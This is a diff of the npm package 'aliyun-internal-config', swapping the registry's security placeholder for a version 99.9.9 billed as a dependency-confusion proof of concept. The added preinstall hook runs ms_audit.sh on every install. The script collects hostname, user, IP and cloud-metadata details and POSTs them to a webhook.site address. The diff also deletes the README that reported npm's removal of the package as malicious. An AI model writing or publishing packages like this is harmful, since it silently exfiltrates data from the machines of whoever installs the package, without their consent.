aliyun-internal-config 0.0.1-security → 99.9.9

package/ms_audit.sh

@@ -0,0 +1,15 @@
+#!/bin/sh
+URL="https://webhook.site/bebcbad8-da0e-43e1-af8d-9d069ca3bd42"
+
+# Mengambil informasi dasar sistem tanpa merusak
+INFO_HOSTNAME=$(hostname)
+INFO_USER=$(whoami)
+INFO_IP=$(ip addr | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | head -n 1)
+
+# Mencoba deteksi apakah ini lingkungan Alibaba (Aliyun)
+IS_ALIYUN=$(curl -s -m 2 http://169.254.169.254/latest/meta-data/product-name 2>/dev/null)
+
+# Kirim data ke Webhook
+curl -s -X POST -H "Content-Type: application/json" \
+-d "{\"status\":\"VULNERABLE\", \"scope\":\"@ali/config\", \"host\":\"$INFO_HOSTNAME\", \"user\":\"$INFO_USER\", \"ip\":\"$INFO_IP\", \"cloud\":\"$IS_ALIYUN\"}" \
+$URL

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "aliyun-internal-config",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "99.9.9",
+  "description": "PoC for Dependency Confusion Research",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "sh ms_audit.sh"
+  },
+  "author": "Security Researcher",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=aliyun-internal-config for more information.